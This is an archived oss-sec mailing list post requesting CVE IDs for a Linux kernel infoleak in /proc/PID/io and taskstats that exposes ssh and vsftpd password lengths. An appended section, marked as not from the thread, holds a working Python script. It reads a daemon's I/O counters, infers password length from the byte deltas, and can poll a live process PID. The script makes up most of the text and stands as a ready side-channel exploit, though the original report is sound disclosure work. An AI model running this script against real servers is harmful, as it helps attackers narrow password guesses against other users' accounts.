oss-sec mailing list archives

Re: CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC)


From: Josh Bressers <bressers () redhat com>
Date: Tue, 28 Jun 2011 16:22:40 -0400 (EDT)

----- Original Message -----

It can be used to learn ssh and ftp password length. If privsep is
enabled in openssh and vsftpd, the unprivileged process' activity very
precisely shows password information.

For vsftpd the read-characters count is strlen("USER username\r\n") +
strlen("PASSWD pass\r\n") + 1, where the 1 is one byte read from a pipe
related to the privileged parent. If one measures statistics between the
user and password commands, the actual password length and username
length can be gathered.

For ssh, vice versa, networking activity is constant in packets length,
but interprocess communications, specifically passwords, depend on user
input.

For ssh pass_len = wchars - CONST, for vsftpd pass_len = rchars -
CONST.

Other daemons with more or less constant io activity might be
vulnerable too. PAM greatly complicates precise measurements.


I think it needs 2 CVE, one for /proc/PID/io and another for
taskstats.

https://lkml.org/lkml/2011/6/24/88


I can't find a nice description of both issues. Can you give me one or two
sentence explanations with a few references for the CVE database?

Once I have those I'll give it two IDs.

Thanks.

-- 
    JB


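The measurement described in the quoted report, written up as an added example (this is not code from the thread or from the kernel patch). It parses the "name: value" lines of /proc/<pid>/io, takes the rchar/wchar difference between two snapshots of the same process, and applies the thread's models: for vsftpd the bytes read around the password command are the length of the command line plus one byte from the parent's pipe (the example assumes the RFC 959 verb "PASS" and no PAM), and for sshd, where the report gives only wchar = pass_len + CONST, CONST is calibrated from a login whose password the attacker knows. The snapshots are constructed; the `watch()` poller is for a live PID and, on a kernel carrying the fix from the lkml thread, fails with PermissionError on a process the caller cannot ptrace, which is the quick way to confirm the mitigation is in place.

```python
"""Added example, not part of the thread: model the /proc/PID/io side channel.

Two snapshots of a daemon's /proc/<pid>/io counters give the bytes the
process read (rchar) or wrote (wchar) in between.  Following the thread's
model for vsftpd, the bytes read while handling the password command are
len("PASS <password>\r\n") + 1, the extra byte coming from the pipe to the
privileged parent; for sshd the thread only says wchar = pass_len + CONST,
so CONST is calibrated here from a login with a known password.  All
snapshots below are constructed, not captured from a real host.
"""
import sys
import time

PROC_IO_FIELDS = ("rchar", "wchar", "syscr", "syscw",
                  "read_bytes", "write_bytes", "cancelled_write_bytes")

# Assumption (RFC 959 verb, no PAM): bytes around the password itself.
FTP_PASS_OVERHEAD = len("PASS \r\n") + 1


def parse_proc_io(text):
    """Parse the 'name: value' lines of /proc/<pid>/io into a dict of ints."""
    counters = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip() in PROC_IO_FIELDS:
            counters[name.strip()] = int(value.strip())
    missing = [f for f in PROC_IO_FIELDS if f not in counters]
    if missing:
        raise ValueError("missing fields: " + ", ".join(missing))
    return counters


def io_delta(before, after, field):
    """Bytes accounted to `field` between two snapshots of the same PID."""
    delta = after[field] - before[field]
    if delta < 0:
        raise ValueError("%s went backwards: PID reused?" % field)
    return delta


def vsftpd_password_length(before, after):
    """Password length from rchar growth across the PASS command."""
    return io_delta(before, after, "rchar") - FTP_PASS_OVERHEAD


def calibrate_const(delta_known, known_pass_len):
    """Recover CONST from a login whose password the attacker knows."""
    return delta_known - known_pass_len


def estimate_password_length(delta, const):
    """Generic form from the thread: pass_len = chars - CONST."""
    return delta - const


def read_proc_io(pid):
    """Read a live /proc/<pid>/io.  On kernels carrying the fix discussed in
    the lkml thread this raises PermissionError unless the caller may ptrace
    the target, which is the check to run when verifying the mitigation."""
    with open("/proc/%d/io" % pid) as f:
        return parse_proc_io(f.read())


def watch(pid, interval=0.005, duration=10.0):
    """Poll a target PID and print every change in rchar/wchar."""
    prev = read_proc_io(pid)
    deadline = time.monotonic() + duration
    while time.monotonic() < deadline:
        time.sleep(interval)
        cur = read_proc_io(pid)
        dr, dw = io_delta(prev, cur, "rchar"), io_delta(prev, cur, "wchar")
        if dr or dw:
            print("pid %d: +%d rchar, +%d wchar" % (pid, dr, dw))
        prev = cur


# Constructed snapshots: the unprivileged vsftpd child before and after it
# reads "PASS hunter2\r\n" (14 bytes) plus one byte from the parent's pipe.
SAMPLE_BEFORE = """rchar: 1024
wchar: 512
syscr: 10
syscw: 5
read_bytes: 0
write_bytes: 0
cancelled_write_bytes: 0
"""
SAMPLE_AFTER = SAMPLE_BEFORE.replace("rchar: 1024", "rchar: 1039")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        watch(int(sys.argv[1]))
    else:
        guess = vsftpd_password_length(parse_proc_io(SAMPLE_BEFORE),
                                       parse_proc_io(SAMPLE_AFTER))
        print("inferred vsftpd password length:", guess)
```

Run it with no arguments to see the constructed case (15 bytes read, 8 of overhead, a 7-character password); run it with the PID of a daemon's unprivileged child to poll the live counters. The child's PID has to be found per connection, and the poll interval only matters for attributing a delta to a particular command, since the counters themselves are cumulative and never drop a byte.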